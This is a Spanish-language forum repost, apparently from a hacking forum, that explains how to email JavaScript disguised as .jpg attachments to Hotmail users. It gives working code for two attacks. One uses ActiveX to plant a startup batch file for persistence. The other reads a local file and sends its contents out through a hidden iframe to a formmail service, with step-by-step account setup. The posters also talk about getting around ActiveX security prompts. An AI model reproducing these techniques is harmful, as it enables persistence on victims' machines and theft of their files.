navegando por hay en contre lo siguiente:

Hola a todos...

Para el que le interese el tema, probar mandar un correo a Hotmail, con un adjunto una supuesta foto en formato .jpg, pero dicho adjunto debe estar formateado de esta manera:
crear un archivo de texto en el bloc de notas con el código javascript por ejemplo de una alerta:
Código:
<script language="javascript">
  alert(' ZaBoo script alert');
</script>
 

Una vez creado guardarlo pero con la extención .jpg, ejemplo "alert.jpg".
Adjuntarlo en un mail, y enviar, probar luego ver el adjunto, y veran que se ejecuta el código del script.

Una simple curiosidad que da para hacer muchas cosas.

Un saludo.
_________________
Para algunos la vida es galopar un camino empedrado de horas, minutos y segundos. Yo, más humilde soy, y sólo quiero que la ola que surge del último suspiro de un segundo, me transporte mecido hasta el siguiente.

un ejemplo:
Código:
<script language="javascript">
Contenido=
  '@echo off\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo Esto es solo una prueba, pero podria haber llamado a algun programa...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo O podria, tambien, detener o activar procesos...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo O, incluso, podria haber borrado algun archivo...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo No se... echale imaginacion...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'exit\r\n'
Archivo=new ActiveXObject("Scripting.FileSystemObject")
Escribe=Archivo.CreateTextFile("c:\\Documents and Settings\\Administrador\\Menú Inicio\\Programas\\Inicio\\bat.bat" ,true);
Escribe.WriteLine(Contenido);
Escribe.close();
</script>


Éste lo que hace es introducir en el Inicio un archivo bat inofensivo (obviamente, habría que cambiarle la ruta cuando proceda); de manera que, al iniciar la máquina, se ejecutaría. El bat sólo te abre una consola mostrándote mensajitos, pero weno ya sabéis... lo que metiérais dentro estaría a vuestra imaginación (ejecuciones, borrados, renombrados, copias, etc...).

La única pega que tiene (aparte de la anterior, por supuesto) es que te sale, antes, un mensajito diciéndote que se va a ejecutar un ActiveX, y el usuario tendría que darle al "Yes". Pero, bueno, ésto siempre depende de la configuración del equipo. Es decir, que a algunas personas con una configuración de seguridad baja, ni siquiera le saldrá el mensajito. No recuerdo, ahora, exactamente cuál era la opción en concreto que lo deshabilitaba (ni si ésta estará seleccionada por defecto o no), pero es cuestión de probar.

Con el "Scripting.FileSystemObject" se pueden hacer 2.000 cosas. Sé que existe, igualmente, la posibilidad de ejecutar archivos directamente (sin tener que hacer todo el paripé anterior), pero no lo domino aún, así es que no sé. También existen comandos específicos para llamar a rutas concretas según sea el caso en un equipo u otro (y así no tener que especificar lo de windows, system32...), obtener datos interesantes, etc... Si encuentro las páginas donde tenía información sobre estas cosillas, ya lo posteo luego. Aunque no sirve para el caso, pero creo que está interesante.

De todas formas, la pega es éso: que cuando se trata de ejecutar scripts desde Internet te da un error, diciéndote que no encuentra el objeto, con lo que no nos sirve pa lo que queremos. A ver si encontramos la manera de hacer que funcionen porque haberla la hay seguro. Y, bueno, recurriedo a algún bug basado en los activex, éso ya funciona por cohones.

Curioso, no sé que decirte. A mi me funciona perfectamente. No sé, yo lo que hago es adjuntarlo como archivo y, luego, descargarlo. No sé si tú lo haces igual o lo adjuntas como imagen. Si no, no sé.

Pues beno, siento no haber encontrado nada aún. Pasao mañana tengo mi último examen, así es que, hasta entonces, no voy a poder entretenerme mucho con ésto. Pero, weno, cualquier cosa que descubra lo posteo, claro.

Venga... a ver si encontramos algo... Ta lueeeeee

PD: el script anterior sólo funciona desde nuestra máquina, con lo que para verlo funcionar sólo habría que guardarlo como html y abrirlo.


otro ejemplo:

Código:
<script language="javascript">
Archivo=new ActiveXObject("Scripting.FileSystemObject")
Abre=Archivo.OpenTextFile("c:\\archivo.txt",1);
Contenido=Abre.readall()
Abre.close();
Formulario="<iframe src='http://www.programasweb.com/cgi-bin/formmail.cgi?pw_id=nombreconelquetehayasdadodealta&datos="+Contenido+"' height='0' width='0'>"
document.write(Formulario)
</script>


Éso enviará el contenido de "archivo.txt" (sólo hay que cambiar el fichero y la ruta según se quiera) a tu correo. Lo único es darte de alta en Programasweb y así no hay que arreglárselas para autoenviar el formulario de hotmail ni nada de éso. Este servicio, además, te enviará su IP, su navegador y su sistema operativo.

Su configuración en sencilla, y te permite enviar los correos directamente en la barra de direcciones, sin necesidad de que se encuentren en formularios webs. Te das de alta y, en la sección, "Formularios" (pestaña Servicios del panel de control), rellenas los datos:

- En el área Obligatorio: primer campo "tu correo@loquesea", segundo (Orden de todos los campos) "datos" (por ejemplo)
- En l área Básico: borras todo (si quieres poner algo en asunto, pues lo pones)
- En el área Personalizado: borras todo
- En Avanzado: borra todo (salvo el 100, si no quieres)

Puesto que no queremos que nos muestre página alguna de vuelta, por éso es mejor que estén vacíos (pa que carguen lo menos posible.), ya que nos va a dar igual, porque van a estar ocultos.

Weeeno, pos ya es otro progreso 

PD: el correo es probable que os aparezca en "correo no deseado", por si no lo encontráis. Y bueno, lo de siempre, tiene que estar habilitada la opción esa del ActiveX


tomado  del foro cyrux para los que no sabian digo por si acaso
 http://cyruxnet.org/foro/viewtopic.php?t=559